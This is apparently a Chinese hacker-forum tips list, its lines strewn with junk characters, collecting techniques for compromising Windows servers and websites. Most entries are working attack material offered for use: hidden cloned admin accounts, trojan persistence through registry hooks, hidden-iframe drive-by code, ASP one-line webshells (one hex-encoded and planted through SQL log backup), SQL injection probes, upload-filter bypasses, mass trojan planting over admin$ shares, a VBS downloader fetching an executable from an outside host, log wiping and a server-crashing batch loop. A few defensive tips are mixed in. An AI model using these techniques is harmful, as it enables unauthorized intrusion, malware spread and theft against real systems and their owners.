Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
: g7 U0 n2 `. _1 acacls C:\windows\system32 /G hqw20:R7 w% V+ P* B4 |' M3 g8 N$ r
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入; P& u: ~6 v& m
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F6 t: y+ O- O7 B! `6 r
1 J0 ~0 O9 l5 e# o$ o8 v+ y2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。) s* z5 e5 s! t% T& P
3 w; C8 P; l4 e1 X6 I7 w5 H
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。) q3 H' j9 f, y6 X
+ N p5 b; f) a$ O4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
* S0 c9 U" W9 u0 Z1 A) c. [! h
$ Z4 d& h& _; @7 _5、利用INF文件来修改注册表1 C9 h' f, K! Z
[Version]
) L% L7 @3 {" V2 X( x0 k3 qSignature="$CHICAGO$"+ I4 e* m, x! N0 ^$ A+ s7 D
[Defaultinstall]% S9 J* M' {* O# A. P7 I
addREG=Ating# Q- o! e- j5 ~4 t$ g- [$ N5 R$ u
[Ating]
7 N4 ^" S8 R B; u3 YHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
2 h& d% [. a; Q& x以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
; ?1 {, I* b) O; p6 Z8 srundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径0 v& m `' g! l( C/ w6 v
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU/ M. o- U% p E& q. b& p/ P' \
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU. d* p" q: `- U3 ^- H# {
HKEY_CURRENT_CONFIG 简写为 HKCC
, t' a: H+ ?* S: _4 k0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值2 b' y8 T: f+ l' e4 [
"1"这里代表是写入或删除注册表键值中的具体数据) O& f! M8 w* n0 ~9 U' X# h8 n/ e
" r9 s% S! i7 u" D; l
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,& K$ I+ _1 k, g* ?- W
多了一步就是在防火墙里添加个端口,然后导出其键值
8 B* \, k3 O; t3 s2 P[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]! C0 T. h" X( I) C% t k5 P
, t6 y: j* G4 V5 |1 j
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽; E% g c1 K4 o- i6 b. X8 S
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
" X! ~1 I6 S. a7 p) N# w- C
' s* s$ q1 `/ C1 m8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
2 O1 e, j# B& p6 h7 _1 P) [! F; v; x" v
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,7 g% G+ {! R3 p9 s
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。5 w& q/ S9 n# V" G! c
4 K \4 N& N( x, c
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
. E% Z; G7 ]" ]. J% h4 G! D2 s
, ]) \: o* w `" M9 k11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,2 \' H/ u/ H- W& l5 W7 S
用法:xsniff –pass –hide –log pass.txt
4 \ k- ?; {8 I5 R. e( h8 A/ K
) @$ D9 q. i; I2 r9 G: n12、google搜索的艺术
! ]8 q/ a" \5 H7 P* C- J搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”3 a8 |& x. i& F9 \- H( f
或“字符串的语法错误”可以找到很多sql注入漏洞。
& w- A; r+ h6 R. V$ O, Z& k* u6 }- Q4 t3 j0 L/ E
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。- i' k! m. H7 N1 p9 V6 k
9 P) f9 D' H1 P14、cmd中输入 nc –vv –l –p 19877 Z6 S( f# Y r- A4 ?' W
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
: Q! X$ ?3 D3 t, T: D
2 r$ G# W5 |1 u& a0 S5 c15、制作T++木马,先写个ating.hta文件,内容为6 B8 j! a$ p- n8 h4 }- F
<script language="VBScript">; s' z) w' e. n$ @& _* t0 z
set wshshell=createobject ("wscript.shell" )
* Z: Y+ s8 l; H6 S$ L3 [a=wshshell.run("你马的名称",1): |' L' z0 m5 J! E- w* Y$ t
window.close
& a6 z1 I3 @+ S! f g( A</script>. r6 ], }8 Y0 w
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。. b' w- ?6 @# V- ]9 w8 ^
2 N( Q9 x/ i( I# _+ ?+ i16、搜索栏里输入& Z8 N8 l% T4 N& A" g; k
关键字%'and 1=1 and '%'=', ^, ^* C: L! w2 `$ S
关键字%'and 1=2 and '%'='
# ?- X: v) d% m# p5 F比较不同处 可以作为注入的特征字符
' W0 s6 s# H7 o4 ~$ D+ q# @, ]. d# A; w
17、挂马代码<html>
- V# E4 z$ U7 B& m<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
8 M) m# M& {! f) s( b5 l</html>
! ^ O( m! @' B0 F; \" K' T& \4 i) ]% q
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,9 e9 f0 @; V7 d) T, E' E1 W
net localgroup administrators还是可以看出Guest是管理员来。4 l2 O/ c& O$ {7 }8 H& ?
( Y* X7 w4 v( L3 c, ?19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等( o' z6 o8 P, J+ W" {
用法: 安装: instsrv.exe 服务名称 路径
- _. K- U {2 m6 {' w卸载: instsrv.exe 服务名称 REMOVE6 E' l" \, A5 @
( b: i& i) M; h" |. `2 g; j$ c2 O% p& \, F6 ~1 E
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
+ l9 z. U2 s+ O% [9 l* p不能注入时要第一时间想到%5c暴库。4 c: {& m" ?0 [ E
( i$ t3 T3 E) O' D
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~# d: @9 f8 C0 p8 ~
! D. P/ m G3 |: G3 u
23、缺少xp_cmdshell时, s2 q3 A" p# u9 M1 L5 O
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
) T5 Y" q' b; @* T假如恢复不成功,可以尝试直接加用户(针对开3389的); w( p: J- E% D
declare @o int
) l! O! ?) L" Z+ W. e: }7 C. Vexec sp_oacreate 'wscript.shell',@o out" g. ?6 \) x- {* q- c
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
2 F5 F# j: K& x. r1 S7 Z/ E" }) H( M" p1 R& m, V
24.批量种植木马.bat
# S5 M# }; R6 D, w% x3 C; @for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中, ~; ^9 F; Z# |) F" @
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
& e6 ^( s) Z% i9 `+ u扫描地址.txt里每个主机名一行 用\\开头
# k1 Y% a$ T6 e( u0 p9 Z& k9 w4 ?1 r4 y0 g2 ^5 A; T+ I
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
3 {" g ^" P% o* s/ G
; G0 o5 c* Q2 Q7 V26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.+ |4 l5 T$ E; E2 I- g
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
, U) {0 U/ D0 e6 O, L.cer 等后缀的文件夹下都可以运行任何后缀的asp木马- o: L! W: h9 s4 q1 \+ G! k
/ k4 a3 ]0 n0 ^8 H27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
2 a( z2 M3 {, g5 E: {9 @然后用#clear logg和#clear line vty *删除日志% P/ O* L* k$ T# e
4 _0 F+ B; n9 c/ S! a7 T8 d28、电脑坏了省去重新安装系统的方法0 e) e8 ?6 X% @4 g3 L
纯dos下执行," y `( Z: `; D1 [8 G5 ~
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
5 X" n3 S/ B( k# h( U8 Q% H9 T2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config. I% r! B) J! C+ w* a
# d" c0 ?7 I# f- {2 y29、解决TCP/IP筛选 在注册表里有三处,分别是:
- n# T8 h/ I; f+ f4 wHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip7 }, Z5 g( `0 D" X1 O
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ a9 I$ m9 _0 x0 s4 X2 HHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
s7 J' N+ x. V& f4 i分别用6 |5 J! c. w, t$ M S* i8 K
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 B9 P: f2 y5 Z( g- N5 U
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
6 H8 b% E+ t8 @# n' H+ Gregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip$ K3 ?- A; j7 c6 y5 |) b
命令来导出注册表项3 V. m: Z6 X/ F# k" V, Q2 G
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
" k9 @) L# h% a改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用& y6 f. g: X1 l
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
, g% f, j) _. A1 B+ v/ {# t
, G w( e6 A. z% `- ?% O0 ~. K, t30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U, @$ P. p8 t* J3 N& ^
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
$ c2 D6 m/ B, r
% |5 m7 V. e6 `& u7 Q X31、全手工打造开3389工具
L+ _4 v4 r5 e3 g打开记事本,编辑内容如下:0 B8 _$ X E( c7 u9 C
echo [Components] > c:\sql
- M" J0 `( S3 T' lecho TSEnable = on >> c:\sql
! k9 z% Q1 h8 |0 F6 |sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q+ }* x& }" |* |0 W7 d" \5 |
编辑好后存为BAT文件,上传至肉鸡,执行; N Q% g: `: X" Q) {5 U6 b j
3 o0 B6 n+ Q2 z% \5 c$ O8 U) H( r% [32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马0 F. \- o$ }8 {. l$ B
7 L( Y* B* ], w0 ?/ M
33、让服务器重启
, r( [) \ \8 h写个bat死循环:: f( ~0 i% q, F9 L$ N1 C+ \/ M
@echo off
; M- Z) i# r, Z1 d/ j1 u:loop1
. Y. _7 s$ F1 @+ S/ ncls
% o: _3 _) t9 a+ U/ tstart cmd.exe
5 k& a9 k4 r* d* Y, F- M8 ugoto loop1# J# v& O0 u3 U5 r& Q
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
$ V# ]% ?& V$ P: S) y
6 Y, {0 }2 ?+ J2 S6 F34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
5 [! {8 J5 t |@echo off
' R6 A+ G) Y6 E8 \- ?7 h" Xdate /t >c:/3389.txt
5 x9 \5 b+ \- M, e% gtime /t >>c:/3389.txt
`6 J! ?+ |% R8 ~- U; v, G# Battrib +s +h c:/3389.bat
! f' G9 e+ m" ?2 s5 ]5 q5 |attrib +s +h c:/3389.txt
$ s+ N; E4 K5 U" Fnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt1 W6 x! H1 ^* c) I
并保存为3389.bat
8 X, N( }: l2 W1 y" L4 i: a; X$ \打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号: ]2 X! x! `0 Y$ f
1 G4 ^7 N9 p8 i' G0 F! j! F6 G35、有时候提不了权限的话,试试这个命令,在命令行里输入:! V$ j/ Z8 {5 y$ T9 E
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
' j9 x5 ?6 a! [( E7 _输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。0 A) l T0 p, g6 A: ?
# c) T" R/ w% p( {* r4 @36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
/ w: U& @8 [- c) _' ?5 O6 Decho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
' m: J! [. H, ?& H) wecho 你的FTP账号 >>c:\1.bat //输入账号' W3 K v7 @1 }' U+ K3 u
echo 你的FTP密码 >>c:\1.bat //输入密码
, f: f$ S6 C) t: m4 Kecho bin >>c:\1.bat //登入
, C% |9 `. d/ kecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
% ]& z2 T' M8 [ Z5 Gecho bye >>c:\1.bat //退出
6 w8 B$ ?) ?) ], e* p. S然后执行ftp -s:c:\1.bat即可0 `3 d% `! X! Q4 r
3 x; Q) W1 [+ i4 g" P37、修改注册表开3389两法
4 M& C7 D$ a& @; u) `8 R: G- P- t(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
* E: Q$ X8 d+ h( i6 c( _, _echo Windows Registry Editor Version 5.00 >>3389.reg
; W( h7 Y% \5 B" E+ D; _echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
; E; L4 d' u. H! M7 w! D3 techo "Enabled"="0" >>3389.reg9 X0 ]0 \* L, o' Y% k: z% x
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows3 v* P% y; \$ o ^
NT\CurrentVersion\Winlogon] >>3389.reg2 w4 o! m! _; `8 q& w7 q0 ?- |
echo "ShutdownWithoutLogon"="0" >>3389.reg7 q1 J0 L3 c7 B1 x8 X
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]# L! I, z. ~ K9 O8 j6 @
>>3389.reg/ d3 \9 N+ `, k+ o
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
1 I9 N0 B- n* yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] ~9 s- |4 |+ n* v$ l. V- O
>>3389.reg
- h5 M5 a9 J) R8 vecho "TSEnabled"=dword:00000001 >>3389.reg7 s* `6 Q" l4 ?- K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
6 {/ L* J! [! A) Oecho "Start"=dword:00000002 >>3389.reg8 \; Z( j6 k- k3 g: t* G. s" u
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]; W/ ]5 X( A& f% t' L4 ~
>>3389.reg; V. P$ B3 R( ~
echo "Start"=dword:00000002 >>3389.reg
, v9 F. @7 t0 @, _+ s; X r% {echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg$ J0 o% I: s- H, n
echo "Hotkey"="1" >>3389.reg
! s% P$ F$ C# ~& j4 u7 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal T6 v; n# F% M) [# d
Server\Wds\rdpwd\Tds\tcp] >>3389.reg9 d% N9 R G: o9 |1 T1 L
echo "PortNumber"=dword:00000D3D >>3389.reg
3 i7 E# e# I5 J+ ?4 l; ]0 Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- J0 _ y$ D: C- b' H; P; G
Server\WinStations\RDP-Tcp] >>3389.reg
' n4 X5 [' K% @( c: D& d; Q, ~1 Gecho "PortNumber"=dword:00000D3D >>3389.reg
8 E2 H+ }/ `! S+ v+ k把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。; Z) d2 C: F; x0 V. {& a8 E
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
6 i1 l x+ ], d/ N因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
/ [. O' K' }: J% d$ j0 L(2)winxp和win2003终端开启
0 _! k. N6 ~* @4 f5 f ^, W用以下ECHO代码写一个REG文件:
5 A; M$ W' p% D/ Y- L( }) Recho Windows Registry Editor Version 5.00>>3389.reg4 [# D0 E8 T7 Q. y; Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& t1 K4 [3 v% l
Server]>>3389.reg
6 Y. q9 `3 P6 k* ^/ recho "fDenyTSConnections"=dword:00000000>>3389.reg$ t4 T, @3 M! R0 M- D6 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal V2 W, j/ B: o+ T& D$ O
Server\Wds\rdpwd\Tds\tcp]>>3389.reg" `' x1 q+ e# K6 Q4 K3 F
echo "PortNumber"=dword:00000d3d>>3389.reg6 d7 e$ K2 i& U( H+ F6 E4 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 T4 r; \% f4 [5 q: p M) }1 Y
Server\WinStations\RDP-Tcp]>>3389.reg5 H/ @% c0 U A* C8 R5 A+ b
echo "PortNumber"=dword:00000d3d>>3389.reg, Y5 L* ?: w9 p' c0 y) z7 V. d$ c
然后regedit /s 3389.reg del 3389.reg
9 C) x5 y7 o, NXP下不论开终端还是改终端端口都不需重启9 s) r/ j/ g( g. f/ O R. X
- G7 I* ^2 M/ Q6 K$ M38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃, J0 I2 X+ Z; P
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'4 |0 K) q& h/ p4 X9 C! f
/ F1 k4 u* \! Q" `8 s39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!; L2 O2 C c d1 h- Q7 [
(1)数据库文件名应复杂并要有特殊字符7 d! Y2 ~/ c( Y) ~- Z! D$ I4 R2 j& c
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
" D" V2 t- Z$ P& G将conn.asp文档中的! F; h0 C& P% G0 c/ }3 U$ ]
DBPath = Server.MapPath("数据库.mdb")5 @4 s& _( Y) ]1 d- @
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
3 c; ^5 K* p7 p3 q0 w' R+ P6 I9 o/ @ N9 R+ ?* R4 s
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置( E3 _$ ]9 ~4 ~% y
(3)不放在WEB目录里0 g% K' T9 [/ y' F5 B
: U6 u, O {4 u/ u2 O) C: S* {
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
$ ~' ^. n5 v' W- Z可以写两个bat文件
* K6 r5 [" Q5 w. c# D@echo off, W! ]% v% U- }- Q3 }4 g8 B
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
4 ~1 K& p* h. k2 k" |9 \: Q" F@del c:\winnt\system32\query.exe- \+ f s6 f1 ~+ h
@del %SYSTEMROOT%\system32\dllcache\query.exe% _, n8 e- I: [% @6 K# j+ B3 A
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的0 i1 q8 f( c9 N% d+ }7 D
- w: a# q0 V0 u@echo off c4 ]. @# f. W4 `4 z
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe3 F, e& } F4 U" Y+ ?* r8 t
@del c:\winnt\system32\tsadmin.exe$ M1 u% w4 M5 o2 A
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
9 I5 m& `! C9 A5 n& f* d# w+ s) g
7 Z+ b6 T# G: N41、映射对方盘符2 B6 m, r) Q# U
telnet到他的机器上,
3 n; C: X7 T" ?' O3 r' X- J/ Enet share 查看有没有默认共享 如果没有,那么就接着运行
8 C$ x1 r$ ^' r) O) v N9 L7 anet share c$=c:
! b8 t. r' g, Bnet share现在有c$( }" w: s/ l6 E. j* ^0 ]4 K3 ]
在自己的机器上运行
8 Y( b0 p$ z- a; J+ G& pnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
7 ~7 I+ n; m4 p
0 U. _1 }% T3 |/ U7 s+ ~: ?7 t( e' \42、一些很有用的老知识
- k, L/ W% l& t/ K% Z2 e+ ctype c:\boot.ini ( 查看系统版本 )
4 Q# t, _3 C9 Z8 wnet start (查看已经启动的服务)
* U; M' f' k' l6 kquery user ( 查看当前终端连接 )
( O, F+ B! C _# f8 R1 n Dnet user ( 查看当前用户 )
4 u8 L; Y% z% `3 R7 `/ u( ]- U4 Vnet user 用户 密码/add ( 建立账号 )
4 Q; r9 i, ~8 E% jnet localgroup administrators 用户 /add (提升某用户为管理员)( z! u& v& w% g* X* f0 K% {7 \
ipconfig -all ( 查看IP什么的 )2 |. N( ~" Z% w
netstat -an ( 查看当前网络状态 )
% V! ~& v$ h7 r0 x' r# l0 Efindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)3 J, z/ M; [( V3 S% \
克隆时Administrator对应1F4( k' |! p; D- g$ ~9 Y# D
guest对应1F58 }' v+ }1 e/ ?& ]7 q0 a
tsinternetuser对应3E8
" _3 W: C/ E- g9 L, A: m( o6 P& R
: C% k' k% A6 F2 \- |9 g43、如果对方没开3389,但是装了Remote Administrator Service3 N' p7 R8 m0 j' p, L* c/ ~
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
3 V( d) c- Y/ R解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
4 y9 ~! `6 a: R9 v& c先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"- C' w3 |/ S6 q6 E) k8 X$ _
3 u/ b( ?% M0 h, J44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
; G) p5 y; X4 o @; o5 B: H本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)$ q, F& {2 O D% A+ M. [
8 x; z3 F4 g+ D
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)6 [$ B C" g1 Z0 u3 i/ A. ^
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open6 ?/ I) W1 O. m7 z5 N# T0 o% |, v
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
! W) H7 c( ?% O; zCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =; q! N3 w* ^7 h5 N- x u
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
( ^2 V' j8 u( }0 m) C7 I: W(这是完整的一句话,其中没有换行符)" p) d2 d. l2 f$ _( `
然后下载:! G) b1 S. }, l
cscript down.vbs http://www.hack520.org/hack.exe hack.exe6 u( k! m8 K6 `( e8 e2 M w, o& n
9 T8 z4 U+ w+ \/ s% q
46、一句话木马成功依赖于两个条件:; H/ S7 j! y- l# }; ^
1、服务端没有禁止adodb.Stream或FSO组件9 ?# |, ~$ o, J; T& w( n
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。9 u- f! ]! z6 @$ [+ \ g. C6 Q9 J
) l- _# w/ D+ O2 E; h
47、利用DB_OWNER权限进行手工备份一句话木马的代码:. k6 T# x- {/ y* | J
;alter database utsz set RECOVERY FULL--3 V9 ?' K# f. `: J1 l' p+ Z
;create table cmd (a image)--
8 D% z3 N/ \* y O0 W/ g* l;backup log utsz to disk = 'D:\cmd' with init--6 a1 m5 L7 ]( _7 D3 o1 B' L
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--* g I- l; z2 p* v' k$ z T
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
4 o& j7 g/ F. l0 f; q' K& f注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
8 c# R' C% Z; [) ^6 V1 F) b7 y) X4 |" ?* q- N+ A5 e+ ~5 w
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:& I9 s. f; g4 s" w+ _
" @# P2 u( m) ]8 P; X6 Y
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options* S' s% m5 S# |" u
所有会话用 'all'。
! p4 t9 ]6 H7 l2 v) ?* s-s sessionid 列出会话的信息。* f! ]" {5 |* _2 y5 y. e
-k sessionid 终止会话。
% T8 ?! X7 l) F9 i, W; A/ V-m sessionid 发送消息到会话。
+ M5 Q8 v, S4 S. T) }& `7 Q3 o8 s% y+ U/ {# q% ~) E, D/ e1 B$ t# h0 V9 D6 p- Z
config 配置 telnet 服务器参数。' Q6 }3 y# X; R, h {
( S0 \' `4 l9 Y: r1 ]; C) s9 A
common_options 为:
* y$ I' Q6 s0 R T; z3 m. i; \-u user 指定要使用其凭据的用户+ B# ~; g5 E W0 P" r# I6 A
-p password 用户密码
2 g+ M" r2 p6 F6 x; F( d5 T% l+ Y/ u1 V' Y
config_options 为:
* _" o- N, o/ ~$ o9 jdom = domain 设定用户的默认域6 R" p0 v$ V5 O( j% ^
ctrlakeymap = yes|no 设定 ALT 键的映射! s9 M8 j1 k, p$ ^& b5 A
timeout = hh:mm:ss 设定空闲会话超时值
z) a1 Y1 Y; d- ]timeoutactive = yes|no 启用空闲会话。; L5 a$ }" Z, a! a; |; [
maxfail = attempts 设定断开前失败的登录企图数。( S2 t2 Z4 W5 d' |- b
maxconn = connections 设定最大连接数。
4 Y" q7 r$ b% C" v# o. v, v1 a5 `+ \port = number 设定 telnet 端口。
+ ~$ _, w& d. y) r, j5 M$ w- y- L' }sec = [+/-]NTLM [+/-]passwd3 o3 C1 `1 d* w5 U7 h; e ]: _
设定身份验证机构
: H7 _1 T1 J+ s6 T9 J3 ifname = file 指定审计文件名。
3 y& {9 r% ~% A; Q& B9 M$ q* C9 Qfsize = size 指定审计文件的最大尺寸(MB)。
$ r# @" ?6 m8 x* `/ m) vmode = console|stream 指定操作模式。) C9 H6 @4 Q7 Y
auditlocation = eventlog|file|both/ x: K2 c! z9 d9 B' n
指定记录地点
5 L: `. t* W4 f; Taudit = [+/-]user [+/-]fail [+/-]admin
7 `3 G- J7 |8 W3 R6 l+ m6 v/ n3 ]/ J+ Q% o
49、例如:在IE上访问:
5 P& U! G! r1 w* @/ {: j" Bwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/7 j5 @" D. @5 h$ z5 A9 `
hack.txt里面的代码是:
0 U9 A F, W9 q8 o1 l+ S f<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">) E+ v! v, ^8 j- ?
把这个hack.txt发到你空间就可以了!& X+ S. Y1 H2 A: f; K1 z& C
这个可以利用来做网马哦! S8 a" h" G2 i* W& n& j
# C1 ]6 ?! d4 \3 y: Y50、autorun的病毒可以通过手动限制!
. v" s: v3 [8 l; z$ m" F8 ^1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!' x& L3 v% J- x$ N
2,打开盘符用右键打开!切忌双击盘符~
2 v/ Y- S, g1 ^ A- }, b+ `. \3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
+ g( G* {8 n& r7 S+ U# S( v$ R) ~& Y( b7 h' q; T' E: G6 r6 d
51、log备份时的一句话木马:
. P0 ]0 v+ S Ca).<%%25Execute(request("go"))%%25>
/ a/ [ h: \0 X, k0 J, a- B# |b).<%Execute(request("go"))%>
7 p. W3 ^: N7 j: e( Y5 Dc).%><%execute request("go")%><%$ v6 U- P+ U: `7 y. V9 I* B
d).<script language=VBScript runat=server>execute request("sb")</Script>6 S0 L$ m7 w1 a# s& F
e).<%25Execute(request("l"))%25>1 a$ q# g! G/ ]- E3 [5 w7 ^/ H
f).<%if request("cmd")<>"" then execute request("pass")%>
2 A( m( ], F/ g* H4 z3 @) {2 r8 R: Q7 ?8 d# ~/ V( P1 E7 a* @* T8 @
52、at "12:17" /interactive cmd
